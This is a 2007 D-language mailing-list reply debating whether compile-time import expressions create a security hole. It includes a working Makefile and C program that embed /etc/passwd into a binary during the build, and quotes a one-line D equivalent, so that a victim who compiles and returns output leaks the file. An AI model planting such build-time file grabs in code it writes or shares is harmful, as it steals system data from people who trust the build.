DMD 1.005 release [security concerns about ImportExpressions]
Yauheni Akhotnikau
eao197 at intervale.ru
Tue Feb 13 02:39:22 PST 2007
On Wed, 07 Feb 2007 09:30:31 +0300, Vladimir Panteleev
<thecybershadow at gmail.com> wrote:
> On Tue, 06 Feb 2007 06:54:18 +0200, Walter Bright
> <newshound at digitalmars.com> wrote:
>
>> http://www.digitalmars.com/d/changelog.html
>
> Hmm. What would prevent someone from writing programs like:
> writef(import("/etc/passwd"));
> and trick someone to compile this program for them (under the pretext
> that they don't have a D compiler, for example) to steal the user list
> (or the contents of any other file with a known absolute or relative
> path on the victim's system)?
I don't think that prevention of including some private data during
compilation is a task of D compiler. That private data can be stolen even
without new import expression -- it is only necessary to have ordinal unix
utilities and make available. Consider the following sample:
=== Makefile ===
grab_password: grab_password.c
gcc -o grab_password grab_password.c
grab_password.c: file_content.h
file_content.h: Makefile
echo 'const char file_content[] = "\' > file_content.h
uuencode /etc/passwd password-info | sed 's/\\/\\\\/g' | sed 's/"/\\"/g'
| sed 's/^\(.*\)/\1\\n\\/' >> file_content.h
echo '";' >> file_content.h
=== grab_password.c ===
#include <stdio.h>
#include "file_content.h"
int main()
{
printf( "file content is: %s\n", file_content );
}
If someone sent this two files to you and asked to compile and return the
result you will send your password without the knowledge about it.
And things are yet more interesting -- many projects use build tools those
built on top on dynamic languages (SCons uses Python, Rake and Mxx_ru uses
Ruby, MPC (from ACE) uses Perl for generating makefiles, OpenSSL uses Perl
for configuration (at least on MSWin platfrom)). In such situation build
script can grab what it wants without telling you a word.
--
Regards,
Yauheni Akhotnikau
More information about the Digitalmars-d-announce
mailing list